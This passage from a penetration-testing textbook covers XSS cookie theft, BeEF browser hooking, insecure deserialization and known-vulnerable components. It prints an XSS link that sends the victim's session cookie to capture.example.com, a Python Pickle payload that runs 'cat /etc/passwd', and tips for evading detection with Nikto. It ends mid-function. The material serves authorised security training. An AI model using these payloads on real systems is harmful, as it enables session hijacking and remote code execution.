malicious site of our choosing while including the PHPSESSID cookie from
evilsite.info in the new request. In this way we are able to steal the cookie
because it is sent directly to a location of our choosing, from the victim's
browser, per our email link containing the malicious request. The redirect

code is nothing more than a "document.location" assignment pointing at capture.example.com; however, we need to add more code to the redirect and configure logic/PHP on example.com to successfully log the request. The final link and XSS payload to be delivered via email to the victim consists of the following (separated by multiple lines for readability):

https://evilsite.info/search?query=<script>document.location=
'https://capture.example.com/cookiestealer.php?cookie='
%2bescape(document.cookie)</script>
Once the victim clicks on this (which some people actually do, and the link could be "hidden" with an HTML anchor tag or obfuscated with encoding), their PHPSESSID cookie is sent to capture.example.com/cookiestealer.php. The PHP code comprising cookiestealer.php is responsible for logging the cookies that were submitted. The cookie value is logged, and the victim is redirected back to the page the form submission came from to help reduce suspicion. The PHP shown in Figure 8.14 handles logging the session tokens.

Figure 8.14 PHP code to log the victim's cookies.

At this point we are able to use the compromised cookie to access the applica-
tion as the victim user. We can do this by using our browser/add-ons to alter
our current cookie to that of the stolen value or by using our interception
proxy to modify the cookie being transmitted to the web application. For
instance, navigating to Burp's "Project Options" -> "Sessions" -> "Cookie
Jar" section (shown in Figure 8.15) allows us to modify our current PH-
PSESSID cookie to the new value. Any subsequent requests to evilsite.info
will include this compromised cookie value and grant us the same level of
privilege as the compromised user/session. Note that once we or the legiti-
mate user logs out of the application, the cookie is no longer valid.

Figure 8.15 Burp's cookie jar.

Finally, let's explore BeEF. The Browser Exploitation Framework is specifically designed to maximize the damage we can inflict on users with XSS. The framework comes preinstalled with Kali Linux and allows us to hook our victims for a somewhat persistent experience. Recall that our XSS attack only works while the victim is actively running our payload; the entire exploit takes place in the execution of JavaScript. This means that once a victim closes their browser, our attack is no longer executing. This matters as we explore BeEF and use it less as a tool to launch a single attack and more as a tool to launch a series of attacks depending on the victim's browser and technology. To get a better understanding of its capabilities, we can launch the administrative interface of BeEF in Firefox and hook ourselves using Chrome. With this setup we can see the multitude of options available to us as attackers. We start BeEF from the command line by typing "beef-xss", which will in turn show us the relevant information to access the UI, hook a victim, and even launch our default browser; we can see this in Figure 8.16. The default credentials to log in are beef:beef.

Figure 8.16 Initial BeEF startup.


To test the features we can point Chrome to /demos/butcher/index.html, which essentially serves the "hook.js" file. Once hooked, the Chrome browser can be attacked from the control panel, visible in Figure 8.17.

Figure 8.17 Potential commands to run.


The available commands drastically increase once we integrate BeEF with
Metasploit, as does our ability to attack the victim. Targeting a hooked
victim with Adobe Flash pop-ups, or a Facebook password reset request, is
a great way to incorporate social engineering into our attack. Modules exist
to take pictures with an integrated camera, turn on the microphone, gather
keystrokes, dump passwords, and the like. In practice, however, one quickly realizes that these modules often don't work, for various reasons.

Link to hands-on portion: https://tptgtwa.com/owasp7


Root Cause and Conclusion: This chapter included several instances of what is in-scope or otherwise allowed per the rules of engagement. More often than not, attacking the users of an application is not allowed, and in these situations a simple alert box proving the existence of the XSS flaw may actually be sufficient. If the client/business fully grasps XSS and the risks associated with this flaw, then we likely don't need to spend more time crafting a robust exploit, especially if we don't have a target victim for the attack. Conversely, when attacking users is allowed, we need to be prepared to launch more complex attacks such as harvesting credentials, obtaining session tokens, defeating XSRF protections, and directly attacking the browser. Several tools exist to help find XSS flaws, but the onus is on us to create a working payload specific to our target application. In most cases we need a remote location to store our code (or have the victim connect to) in order for our attack to be fruitful. XSS attacks can be potent, but the adoption of content security policies, browser defense mechanisms, and better coding practices/frameworks makes our job more challenging. Because of this, having mature tools and relying on our reproducible methodology are key to successfully identifying XSS. Once identified, our ability to exploit XSS in a meaningful way relies on our skill set and the quality of our tools, the latter of which can be fleeting. Before conducting any penetration testing we always have explicit written permission, and when we incorporate potent XSS attacks targeting users of the application, we want to make sure this topic has been clearly discussed and included in the rules of engagement.
Chapter 9

OWASP A8:2017 Insecure Deserialization

Definition: Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.

Details: Insecure deserialization was added to the OWASP top ten for 2017 based on input from the information security community, as we have seen a significant uptick in this type of flaw being exploited, along with the potential for abuse. To understand this flaw, let's take a moment to discuss serialization. Serializing objects or data means converting data from a form that is awkward to transmit into a string or byte stream (commonly JSON) that can easily be sent across the wire. Typical objects which are serialized might be arrays of data or binary data structures. The reason these objects are serialized is so they can easily be sent from the client to the server while preserving the structure of the data: its attributes, elements, and hierarchy. A typical object might look like Figure 9.1.


Figure 9.1 Example object which might benefit from serialization.


This example object contains a nested array and would be challenging to
transmit in this format while maintaining its integrity and ease of access/use
by the receiving party. For this reason, it is best to serialize this object,
which in turn, would result in essentially converting the object to a string.
An example of this object being serialized is shown in Figure 9.2.

Figure 9.2 Results of serializing the object.


The content of the object stays the same while the format changes to provide a means of organizing the data so it can be easily deconstructed and understood by the application/language and persisted to disk. All of the most popular web programming languages have the capability (either natively or via a third-party library) to serialize and deserialize data. Thus, as we continue the conversation, we should know that deserialization flaws are not OS-, platform-, or language-specific. As we can see with this JSON example, we are merely using the syntax of JSON (square brackets, curly braces, commas, and colons) to denote the level of nesting for the items in the object. The same idea of serialization can be achieved in XML and other formats as well (BSON, YAML, etc.). The end result is a data structure converted to a string. This is useful for web applications, as this process not only allows the object to be sent and parsed easily, but also reduces overhead and storage concerns when done properly.
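The round trip sketched in Figures 9.1 and 9.2 takes only a couple of lines of JavaScript; the object shape below is illustrative, not the book's exact example.

```javascript
// Serialize a nested object to a string and deserialize it back,
// mirroring Figures 9.1/9.2. The data itself is made up.
var user = {
  name: "alice",
  roles: ["editor", "reviewer"],
  prefs: { theme: "dark", notify: true }
};

var wire = JSON.stringify(user);   // serialize: object -> string for transmission
var copy = JSON.parse(wire);       // deserialize: string -> equivalent object
```

The string preserves the attributes, elements, and nesting, so the receiving side reconstructs an equivalent object.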
Deserializing is simply the process of converting the serialized string back into the original data structure. The flaw of insecure deserialization shares similarities with other web application flaws in that, during the process of converting the string, if there is malicious input not accounted for, we can cause harm to the application. This should be reminiscent of XXE from the perspective of a vulnerable parser, and reminiscent of injection from the perspective of inserting a malicious payload. Exploiting this flaw can lead to privilege escalation or otherwise bypassing access controls, as well as denial of service and remote code execution. The attack surface for exploiting this flaw consists of client-controlled input which will be serialized and sent to the server. Thus, the way we attack this flaw is by injecting malicious code into an object we can control. Typical places to look for serialized data range from cached storage objects and APIs to cookies, ViewState, HTTP headers, and parameters.
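To see why an unguarded deserializer is dangerous, consider a deliberately naive JavaScript one built on eval(). This is a toy illustration of the flaw, not something any real application should ship: any code embedded in the "serialized" string executes during deserialization.

```javascript
// TOY EXAMPLE — never deserialize untrusted input like this.
// eval() rebuilds the object, so attacker-supplied code executes.
function unsafeDeserialize(s) {
  return eval("(" + s + ")");
}

// Benign input behaves like JSON.parse...
var ok = unsafeDeserialize('{"user": "alice"}');

// ...but a crafted payload runs arbitrary code as a side effect of
// simply being deserialized.
var evil = '{"user": (function () { globalThis.pwned = true; return "x"; })()}';
var hacked = unsafeDeserialize(evil);
```

Safe parsers such as JSON.parse reject the second input outright, which is exactly the difference between a data format and a code path.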
Identifying insecure deserialization takes effort and builds on our previous work of reconnaissance and mapping. During those phases of our methodology we should have been able to determine the platform, including the programming language(s) employed by the application. While this flaw is technology-agnostic, the way we identify and exploit it is very specific. For Java-based applications there are several indicators of a serialization process being used, such as an HTTP header including "application/x-java-serialized-object", the prefix rO0 (the letter r, the capital letter O, and the number 0) in base64-encoded data, and a hex signature of AC ED 00 05. For C#/.NET applications we can leverage our proxy and search for a base64-encoded string of "AAEAAAD/////" as well as client-side code containing the strings "TypeObject" and "$type:", as these are all indicators of a serialization process in place. We can also use other previously described tools to help identify components which may be vulnerable to this flaw (such as third-party libraries). If we have access to the source code, as an in-house penetration tester, know that there are additional language-specific checks we can perform.
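These signatures are mechanical to check. The sketch below (helper names are mine) tests for the raw Java magic bytes and shows why base64-encoded Java serialization data starts with rO0:

```javascript
// Sketch: flag likely Java-serialized blobs by their signatures
// (0xAC 0xED 0x00 0x05 raw, the "rO0" prefix when base64-encoded).
function looksJavaSerialized(buf) {
  return buf.length >= 4 &&
         buf[0] === 0xac && buf[1] === 0xed &&
         buf[2] === 0x00 && buf[3] === 0x05;
}

function looksJavaSerializedB64(s) {
  return s.startsWith("rO0");
}

// The base64 prefix follows directly from the raw magic bytes:
var magic = Buffer.from([0xac, 0xed, 0x00, 0x05]);
var b64 = magic.toString("base64");   // "rO0ABQ=="
```

Grepping proxy logs or request bodies for either form is a quick first pass before reaching for the Burp extensions discussed later.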

Real-World Dialog: I was engaged by a start-up to assess their flagship web application, soon to be deployed publicly, and the development team had little experience in writing secure code. Every single OWASP top ten vulnerability was discovered throughout the penetration test, to one degree of risk or another. Even with injection, XXE, and sensitive data exposure, there was still more to be gained with the exploitation of a deserialization vulnerability. The application was Java-based, and with the mostly reliable tool "Java Serial Killer" at my disposal, an attack was crafted to gain shell access on the system.
The exploit worked with little effort and I proceeded to escalate privilege to get root access via a SETUID binary. With root access on one machine I was able to attack and pivot to other systems by abusing unencrypted network communications via a man-in-the-middle attack, including targeting AD-joined Windows machines. Pivoting once again from the DMZ to the corporate LAN at the organization's headquarters was particularly interesting and somewhat challenging due to all publicly facing systems being hosted in the cloud. Still, service accounts had to access some machines, and when updates or AV detection stopped working, an administrator logged in locally to address the issue, which provided me access with a valid token. From there, coupled with a lack of two-factor authentication, I was able to VPN into the corporate environment and continue pivoting, compromising, and surreptitiously obtaining sensitive information. The engagement only lasted one week. The primary goal was to focus efforts and time on the application, but with each compromised system, a call was placed to the main point of contact to communicate the current situation and agree on next steps. A primary goal of any penetration test is to accurately measure the risk a given vulnerability poses to the organization, and with the help of one deserialization flaw, the entire company was at risk.

How to Exploit: Exploiting insecure deserialization can be achieved by


identifying a vulnerable injection point we can control, and crafting a suitable
payload to take advantage of the deserialization process. We can accomplish
this with the help of some scanning tools previously discussed and via manual
methods. In looking at the URL or page of an application, we can't readily
determine if it is vulnerable, and we need to look deeper for indicators of
weakness. As with other web application-specific flaws, two of the best tools
to help with this process are our browser and proxy. By sending a request to
the application and observing the response, we may be able to determine if the
application is using serialization. As discussed, we can look for indicators in
HEX, base64, and HTTP headers. A graphical representation of a serialized
object in the HTTP headers is shown in Burp's interface in Figure 9.3.

Figure 9.3 HTTP response header indicating serialized object.


Based on the response indicating the existence of a serialized object, we
want to look back to the original request which resulted in the application
returning a serialized object and determine what, if any, of the input we can

modify to alter the resulting serialization process. One way to help determine which input results in modified output is by using Burp's Repeater, akin to ZAP's Open/Resend request editor. By using this tool we can visually see a difference in responses after we make a change to the input, or we can select two requests from the proxy history and send the responses to the Comparer tool in order to accurately identify a change in the serialized output. An example of this is shown in Figure 9.4.

Figure 9.4 Burp's Comparer showing seven color-coded differences between the two responses.

Once we know our input has a measurable impact on the serialized output, we can identify which exact input we need to fuzz. To help with the task of identifying and eventually exploiting this flaw, we can use several Burp extensions: Java Deserialization Scanner (for Pro versions of Burp), Java Serial Killer, and Java Serialized Payloads. By sending the POST request to the Java Deserialization Scanner extension, we can then set the applicable insertion point as we would with an Intruder scan, as seen in Figure 9.5.

Figure 9.5 Setting an injection point using the Deserialization Scanner.


The tool works by sending library-specific attacks with a sleep payload in order to determine if the application is utilizing one of the libraries and, if so, confirms the vulnerability. In this sense the discovery portion is benign, but useful in validating the use of a vulnerable library. The results of the initial scan confirm whether a vulnerability has been found, as seen in Figure 9.6.

Figure 9.6 Viewing results of the scanning tool.


The next step is to attempt to exploit the identified vulnerability using the same Burp extension: from within the "Manual Testing" tab, a right-click sends the attack to the "Exploitation" tab within the same extension. Again we proceed to select an insertion point, the same one found to be vulnerable based on the initial results, and we select a custom payload. Note that we are leveraging the ysoserial JAR, which we installed as part of the extension installation. ysoserial is a utility for generating payloads to aid in attacking vulnerable Java implementations. So, while we are setting a custom payload to execute, this utility helps to make sure our
OWASP A8:2017 Insecure Deserialization 143

payload is constructed in a way to enable our attack to succeed. A suitable


payload would be an OS command, as our code will run at the OS layer of
the application in this circumstance based on the platform/implementation
we are attacking. For a Linux OS known to be running Java and a webserver,
a suitable command might be to deploy a WAR file with a JSP shell, attempt
to deploy a Python listener, or focus on account/SSH access. When
submitted, the payload may not show the results of the command in the
application/browser (like "ls" results), and when executed successfully, we are
once again restricted to the level of permission under which the current web
application is running. Another useful tool to aid in exploitation is the Java
Serial Killer extension in Burp. The setup process is very similar to any other
attack we want to launch, but a noteworthy difference between this tool and
the Deserialization Scanner is that it does not require the Pro version of Burp.
Java Serial Killer runs in the Community edition, and we can leverage
it by sending a suitable request from the proxy feature to this extension.
Configuring the attack is a similar process to the Deserialization Scanner
in that we select an injection point and a payload, and submit the request.
However, we need to manually choose which library to target, as well as
whether to serialize our attack string with optional Base64 encoding.
This is important because without encoding the payload, the attack may
not work. We can see an example of this in Figure 9.7.

Figure 9.7 Launching an attack with Java Serial Killer tool.
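The encoding step stressed above can be sketched as follows; the payload bytes here are a stand-in for real ysoserial output:

```python
import base64
import urllib.parse

# Placeholder payload; a real attack would use bytes generated by ysoserial.
payload = b"\xac\xed\x00\x05serialized-gadget-chain"

# Base64 keeps the binary stream intact in transit...
b64 = base64.b64encode(payload).decode()
# ...and URL-encoding (safe="") escapes the +, /, = characters so they
# survive inside an HTTP parameter.
param = urllib.parse.quote(b64, safe="")
```

Skipping either step can corrupt the serialized stream in transit, which is one reason an otherwise correct payload silently fails.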

Java, PHP, Python, Node.js, .NET, Ruby, and other languages can be susceptible
to this type of attack, although the tools we use to exploit other
language-specific vulnerabilities will vary. Let's take a look at some examples
of full exploitation.

Examples: To elaborate on what has already been discussed, we can focus
on another vulnerable platform, Python. To exploit a deserialization vulnerability
in a Python application, we can leverage the same base set of tools
with some modifications.
The example target web application is running Python, which uses Pickle
for serialization and deserialization, and is also known to be vulnerable to
deserialization attacks. When browsing to the application we want to pay
careful attention, using our proxy history, to the requests we are making
as well as other background or subsequent requests made as part of page
loading or JavaScript/AJAX interactions. In looking at the application
(shown in Figure 9.8) we see there are multiple inputs, and when viewing
the requests and responses throughout the mapping process we see there is
evidence of serialization.

Figure 9.8 Viewing the inputs on the potentially vulnerable website.

With this information we can try to launch a serialization attack; even without
this information we could blindly try. However, in looking at the HTTP
response headers (depicted in Figure 9.9) we can see the CGI language is
Python, and using this knowledge we can craft a suitable attack.

Figure 9.9 Viewing the HTTP headers and noting the CGI language.

The vulnerable web application takes multiple forms of input via text inputs
as well as a file upload feature. We can use our interception proxy to get
an idea of what a valid POST request looks like when constructed using the
selections from the drop-down menus in the form. In looking at the payload
of the POST request we can see there are four parameters: Date, Record
Name, Author, and Recipient. Submitting a request immediately shows the
results in the lower portion of the page, with the input name and value in
a table format. We can see this in Figure 9.10. Uploading an unformatted
file results in a 401 HTTP response, however. While the application is likely
using Python, indicators of serialization are in fact not readily evident.

Figure 9.10 Results of successful POST request showing inputted values.


Focusing on the form's upload feature, we can attempt to submit serialized
data in the hopes it will be deserialized insecurely by Python. To do so, we
first need to look at a typical use case within Python to see how this normally
works with Pickle, a Python module used specifically for this process. Figure
9.11 shows a Pickle reference.

Figure 9.11 Python reference for pickling.


The example code also comes with a sample of how to use the class. We can
see a minimal working example in Figure 9.12. From here we gather how the
flow of input is handled and returned, as well as how the loading and reading
of the lines from a given file are processed. While we can't see the source
code of the vulnerable application during a black box engagement, we can
infer, hypothesize, and test.

Figure 9.12 Python example for pickling.
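A typical benign round trip with Pickle looks something like the following (our own minimal example, not the book's figure):

```python
import io
import pickle

record = {"date": "2019-01-01", "author": "alice", "recipient": "bob"}

buf = io.BytesIO()
pickle.dump(record, buf)       # serialize the object to a byte stream
buf.seek(0)
restored = pickle.load(buf)    # deserialize -- unsafe if the stream is untrusted

assert restored == record
```

The danger is entirely on the `load` side: Pickle will happily reconstruct whatever the byte stream tells it to, which is exactly what we exploit next.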

To that end we can write our own Python script, upload it to the application,
and depending on how the application processes it, perhaps get our code to
execute. We know that during a serialization attack our input will first be
serialized, by us or the application, and then subsequently deserialized in an
unsafe manner. We can once again infer that our attack is making it past the
deserialization process, is syntactically correct, and meets the requirements
of the application's upload feature based on the responses or errors we receive
when uploading the file.

Figure 9.13 Initial exploit code showing desired command to execute.

Simply uploading the code described in Figure 9.13 will not suffice, as the
function has no way to be called and executed. Thus, we would want to alter
our attack to leverage a multi-upload approach in which one file gets uploaded
and a second uploaded file references a function in the first to execute the
code based on the deserialized construct. Or we could take advantage of
the pickling process to define a function which, when deserialized, will be
executed. We can see this in Figure 9.14.

Figure 9.14 Exploit code defining a function that is executed upon deserialization.
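The second approach can be sketched with Pickle's `__reduce__` hook, which lets an object dictate what call reconstructs it during deserialization. This is the standard shape of a Pickle exploit payload; the class name is illustrative:

```python
import os
import pickle

class Exploit:
    def __reduce__(self):
        # When the victim unpickles this object, Pickle "reconstructs" it by
        # calling os.system("cat /etc/passwd") -- attacker-controlled code.
        return (os.system, ("cat /etc/passwd",))

# Serializing is harmless; nothing executes until pickle.load()/loads()
# is called on the resulting bytes by the target application.
payload = pickle.dumps(Exploit())
```

Uploading `payload` to the vulnerable endpoint triggers execution the moment the application deserializes it.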


Upon successful upload, the OS command cat /etc/passwd is executed and
we see the results of the output in the application, visible in Figure 9.15.
Other attacks are blind in the sense that we won't immediately see the
results, as with other injection-based attacks.

Figure 9.15 Output of the executed OS command shown in the application.

Link to hands-on portion: https://tptgtwa.com/owasp8


Root Cause and Conclusion: Insecure deserialization can be a significant
issue for web applications due to the potential exposure when exploited. The
root cause of this vulnerability stems from utilizing untrusted data as part
of the deserialization process, but is less focused on insecure libraries than
on a lack of process surrounding the application's data flow. Because of this,
it can be challenging to remediate this flaw without time-consuming
architectural changes. For some organizations the changes are minor, depending

on the impacted code/processes in place. From an attacker's perspective, we
need to ensure we are adding checks for this flaw into our mapping and
scanning phases, as well as identifying when serialization is occurring, to home in
on potential attack surface. Depending on the implementation, this flaw can
result in escalating privileges and even remote code execution; while
deserialization flaws are not extremely common, the potency of an attack can make
this a significant finding. There are also tools for multiple platforms that
help with this attack and ease the effort of exploitation.
Chapter 10

OWASP A9:2017 Using Components with Known Vulnerabilities
Definition: Components such as libraries, frameworks, and other software
modules run with the same privileges as the application. If a vulnerable
component is exploited, such an attack can facilitate serious data loss or
server takeover. Applications and APIs using components with known
vulnerabilities may undermine application defenses and enable various attacks
and impacts.

Details: There are similarities between OWASP 9 and OWASP 6 (Security
Misconfiguration), the main difference being securely configuring elements of
the application as opposed to incorporating vulnerable components; there is
overlap, but what we are looking for and how we exploit each is distinct.
One of the more challenging parts of modern web application development
is the inherent complexity of every newly developed application. It
is rare to come across a simple implementation, though that is of course subjective.
One reason for this is the very low barrier to entry; with very little
money, anyone with the knowledge can create their own application. This
is how lots of developers start their careers: with a GitHub account, code
examples, contributions to projects, and practice. Technology is very cheap
and open-source software is prolific. There is no one right way to implement
technology; competing solutions offer their own pros and cons, so
anyone, from individuals to Fortune 500 companies, is free to develop the
system that best meets their needs. When discussing open-source software and
technology, we have to understand that a significant amount of software is
supporting the web application: from the stack, which we already discussed, to
authentication/authorization services, containerization, frameworks, parsers,
APIs, microservices, analytics, payment processing gateways, a plethora of
third-party code, and underlying technology. This technology directly or
indirectly supports the web application we are responsible for testing, and thus
the onus is on us to understand and test it for susceptibility to weaknesses.
We can typically leverage the NVD, security advisories, bug trackers, GitHub
issue trackers, and the like to thoroughly search for known vulnerabilities
in a given set of components. Identifying the components is straightforward
for all client-side technology, but more challenging for server-side software.
There are several automated scanning tools which will help find vulnerabilities
based on version numbers, but of the hundreds of thousands of known
software vulnerabilities, only a fraction have checks built into vulnerability
scanning tools to identify them.
Anyone can write software and publicly release it, just as anyone can
choose to use that software (with some restrictions), but what happens when
no one updates it? What happens when a vulnerability is discovered, and
patched, but that patch is never installed? What happens when a business
has hundreds of applications, patches them regularly, but is not aware of all
dependencies? In each one of these situations there is attack surface. We need
to recognize this attack surface, identify applicable flaws, find a matching
exploit or write our own, and measure the subsequent risk of the vulnerability.
Depending on the criticality of the application and its level of sensitivity,
using components with known vulnerabilities can be more devastating than
all other entries on the OWASP top ten list. Remember Equifax?

Real-World Dialog: The year 2014 was significant for critical security
vulnerabilities being released. Some of the most impactful flaws were Drupalgeddon,
ShellShock (the Bash bug), and Heartbleed. I was a Senior Security Engineer
working in the financial sector for a billion-dollar entity, and was responsible
for, among other things, identifying our company's exposure to these critical
vulnerabilities. Heartbleed ended up being the biggest threat for us.
At that time our threat and vulnerability management program was mature
enough to provide me with a snapshot of all system vulnerabilities, and
Rapid7/Nexpose had released a check for Heartbleed in addition to the
publicly available Perl script everyone at the time was using to check for the
vulnerability. The overwhelming majority of our servers were running Windows
with Microsoft's TLS implementation, which was not vulnerable, but
we had a large footprint. We owned/leased a /20 (4,096 external IP addresses)
that did not even include our remotely hosted systems. With over 100
domains, several significant business units, and thousands of servers,
workstations, network devices, appliances, printers, and more, the challenge was
ensuring we were scanning everything we owned or were otherwise responsible
for. At one point during my quest to make sure all of our assets were
scanned, I even made the overzealous mistake of actively exploiting Heartbleed,
dumping RAM, obtaining credentials, and logging in with those credentials
on a domain which was very similar to one we owned but alas was not ours
(oops).
By the time three days had elapsed since the original public release of the
vulnerability, my team and I felt confident the enterprise was not at risk, since
all known Heartbleed vulnerabilities (however limited) on internal systems
had been patched, and externally available systems were scanned and found
to not be vulnerable...or so we thought. The next day we learned of our
oversight. Working on the enterprise security team, my colleagues and I were
responsible for making sure all business units under the corporate umbrella
were included in regular scanning. One business unit, however, was not being
completely scanned, at least not by my team. A client/user of this business
unit's services (just a regular person on the internet) made the discovery
by using the same Perl script to exploit the OpenSSL implementation on
a WAF. He took a screenshot, sent it in an email to the business's general
contact mailbox, and that message quickly made its way through the process
of escalations until reaching the president of the company, as well as all
C-level executives, and subsequently my team's email distribution list. It was
an epic fail on the part of enterprise security. How could we scan everything
for multiple days and miss this? The impact to the business was nonexistent,
as there was no evidence of abuse, but the impact to my team's reputation
was real.
At the same time, my previous employer was mostly a Linux shop and
fared MUCH worse, as they had just over 500 publicly exposed servers running
the vulnerable OpenSSL version. In the days and weeks that followed
the public release of Heartbleed, one could always tell who was impacted by
looking at the SSL certificate's date of issue; if it was issued within the last
week, that was a pretty clear indicator that the system had been vulnerable and
the proper remediations took place to remedy the situation.

Heartbleed was a significant vulnerability, the likes of which I don't think
have been surpassed yet. There have been several close rivals, but the ability
to remotely attack systems, potentially gain access to critical information, not
trigger any alarms or risk crashing the service, and do so consistently and
with ease makes Heartbleed probably the most critical vulnerability I have
had to protect against in my career. These elements also make Heartbleed
one of the most fun to exploit. OpenSSL is but one of dozens of components
we may use for our web application. Taking the time to fully understand what
comprises an application, and what makes it work/what technologies it relies on,
will go a long way in our efforts to secure the application; the same can be
said for attacking it.

How to Exploit: Attackers have a luxury enterprise defenders do not have:
time! As an attacker we need to find one critical shortcoming and exploit it
to gain access and wreak havoc (or more accurately, exploit it in a controlled
and professional manner to accurately convey the risk of the exposure).
Defenders have the challenge of trying to secure everything and thus, their
time and resources are typically stretched thin between the various tasks and
projects for which they are responsible. Because of this, a security operations
center (SOC) has to rely on the development team (and other teams) to
take part in security. A SOC, DevSecOps, penetration
testers, security champions, and other names for people or teams directly
responsible for application security are myriad, but all too often there is a
disconnect between the people writing the code and those responsible for
providing the infrastructure, scanning the code, provisioning systems, reporting
vulnerabilities, and speaking to the board of directors. This is reality, and it is
typically more pronounced the larger an organization gets. As this disconnect
grows, so does the potential for overlooking seemingly benign elements of the
security program. This is where we need to focus our efforts as penetration
testers in order to identify when a web application is using components which
are known to be vulnerable.
For in-house penetration testers, we need to bridge the gap between security
and development. We have to insert ourselves into the process in order
to understand the platform and where/when risks are introduced, as well as
forecast what will eventually become an issue if no action is taken to prevent
it; for instance, if an open-source library the application relies upon ceases
to be maintained.
As the title of this chapter indicates, for OWASP number nine we are
trying to identify components with known vulnerabilities. We as an information
security community, and more broadly as a society, don't have a history
of blaming the victim when a 0day is used, and of course the very nature
of a 0day means there is no signature for it. Hence, known vulnerabilities
are what we need to focus our attention on, as we can usually easily
identify them. In most cases we do this by using a vulnerability scanning tool
and other automated scanning solutions. Before we discuss tool usage, let's
revisit our luxury of time as it relates to 0day vulnerabilities. There will be
times when we are sufficiently motivated (halfway through an engagement
with no access to any systems) to focus attention on discovering a new
vulnerability. The 0day terminology is more reserved for previously undisclosed
vulnerabilities with the potential for great impact (not necessarily reflected
XSS on a homegrown app with a minimal user base), but any new vulnerability
we discover can still be used as part of our engagement and responsibly
disclosed to the vendor. Finding vulnerabilities in software components is
usually accomplished by reviewing the source code (in open-source projects,
for example), identifying criteria that cause the software to malfunction,
or by other fuzzing techniques. While time-intensive (between identifying an
error condition and crafting a suitable and reliable attack), exploring new
vulnerabilities can be fruitful and is certainly a skill set to sharpen.
Oftentimes discovering new vulnerabilities is not necessary, however, as
there are enough application layer vulnerabilities to take advantage of. Using
a vulnerability scanning tool is a great way to find these; enter Nikto. Nikto
is a free tool written in Perl that we can use to scan web applications for
thousands of potential issues. Nikto is not a full-featured web application
vulnerability scanning solution, but it is free, it works well, it is updated
regularly, and it is mature (reliable) software. For these reasons it is a go-to
tool to gain an initial idea of the attack surface of an application. As a CLI
tool, we invoke it by specifying nikto.pl -host https://evilsite.info, but not
before changing the default user agent.
Nikto is not designed to be stealthy; in fact, by default it will send a user
agent string clearly identifying itself to the target system, and because of
this, it will be blocked by any properly tuned IPS/WAF. It's not uncommon
for someone new to the tool to run it, get no results, and be oblivious to
the fact that the scans were all being blocked by an intermediary device. If
Nikto is installed as part of our OS, then /etc/nikto.conf is the location of
the configuration file we need to edit. Likewise, if we download the tool, then
the nikto.conf file located in the downloaded archive will be the file we need
to modify to alter the user agent string. We can see this in Figure 10.1.

Figure 10.1 Nikto directory structure.

A quick way to obtain a common user agent string is by using our browser
to conduct a web search for "what is my user agent", copying the resulting
string, and pasting it into the appropriate section in Nikto's configuration
file. We can just as easily tell Nikto which agent to use at runtime via
the -useragent switch; the takeaway is to never use the default agent. This
process is depicted in Figures 10.2 and 10.3.

Figure 10.2 Identifying our user agent quickly.

Figure 10.3 Modifying Nikto's configuration file to change the user agent.

Running the tool produces output on the command line conveying identified
issues. The tool will always mention missing security headers that are
useful for client-side attacks. In addition, Nikto will communicate the path
on the server where the issue was discovered, which makes reproducing the
finding easier. We definitely need to manually verify the results, as Nikto,
like other tools, will produce false positives, such as incorrectly identifying
vulnerabilities or incorrectly keying off of HTTP 200 response codes. There
are a multitude of configuration options we can modify to get more targeted
results; running nikto.pl -H will output an extended help menu showing the
various options available. Outputting scan results to a file with the -o option
is useful, as is running the tool through a proxy to help see what traffic it
is submitting, as well as enabling evasion, tweaking the max timeout, and
specifying a hard stop time for the scan. Figure 10.4 shows the results of a
Nikto scan.

Figure 10.4 Viewing Nikto's results on the command line.

While we are looking at the missing security headers, the securityheaders.io
website is a great resource for externally checking for the existence and proper
implementation of all security-related headers. The tool (see Figure 10.5)
shows output similar to the Qualys SSL check: a bright red "F" or shiny
green "A+" for web applications failing to implement security headers and
those that do so very well, respectively.

Figure 10.5 Results of securityheaders.io HTTP response header checking.
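We can script a quick version of this check ourselves; the header list below is a representative subset of what securityheaders.io grades on, not its exact rubric:

```python
import urllib.request

# Commonly expected security response headers (an assumed, partial list).
EXPECTED = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "X-Frame-Options",
    "Referrer-Policy",
]

def missing_security_headers(header_names) -> list:
    """Return the expected security headers absent from a response."""
    present = {name.lower() for name in header_names}
    return [h for h in EXPECTED if h.lower() not in present]

def check_site(url: str) -> list:
    """Fetch a URL and report which expected headers it fails to send."""
    resp = urllib.request.urlopen(url)
    return missing_security_headers(resp.headers.keys())
```

Comparing header names case-insensitively matters here, since HTTP header field names are not case-sensitive.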



The initial Nikto scan didn't find much, but it also didn't spider the site, an
important piece of information we should be aware of. In fact, in looking at
our interception proxy (if configured to do so) or HTTP access logs, we can
see Nikto spends lots of time/makes lots of requests for default file names (we
can see this in Figure 10.6) and does not provide robust coverage for testing
the OWASP top ten, for example.

Figure 10.6 Nikto scanning requests as seen from Apache's access_log.

Nikto is quite useful for finding files indicative of compromise or poorly
configured application components, but it is limited in what it searches for;
another tool to explore is Wapiti. Wapiti is another free tool, this time written
in Python 3, which has support to identify file inclusion vulnerabilities,
command execution, injection vulnerabilities, as well as more typical issues
like XSS and certain misconfigurations. We can run Wapiti just as easily as
Nikto, with simple command execution from our terminal. An example of
doing so is shown in Figure 10.7.

Figure 10.7 Wapiti's initial scan.



This time when we examine the HTTP access logs to see what requests Wapiti
made, we note there are only four. Not particularly indicative of a thorough
test. We can see this in Figure 10.8.

Figure 10.8 Wapiti scanning requests.

The reason for this is that there are no parameters included with the request,
and the home page for evilsite.info was essentially a blank page. The reason
it is important to see a lack of useful findings is to make it clear that tools
are often very close to useless if we don't configure them correctly and know
how they work.
Focusing on evilsite.info, performing some initial recon to help guide tools
like Wapiti during their scanning process can be accomplished with
archive.org, web searches, and forced browsing. We are looking for the
existence of other folders and pages on the website. Archive.org made several
archives of the website throughout the years, and it looks like evilsite.info was
used for various phishing campaigns. Search engine queries don't return any
useful results, but guessing directories with a forced browse attack does
reveal several potentially useful directories. By manually browsing to /xss.php
we can see what looks to be a training environment with a vulnerable form.
Pointing Wapiti to this form and providing a base GET request (submitting
the form presented on the page) results in the tool finding one XSS flaw,
which we can see in Figure 10.9.

Figure 10.9 Wapiti finding one XSS flaw.
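The forced browse step mentioned above can be sketched as a simple loop over candidate paths; the wordlist here is illustrative, and the status-code fetcher is injectable so the logic can be exercised without touching a live target:

```python
import urllib.error
import urllib.request

# Small illustrative wordlist; real forced browsing uses much larger lists.
CANDIDATES = ["admin/", "backup/", "test/", "uploads/", "xss.php"]

def force_browse(base: str, paths, fetch=None) -> list:
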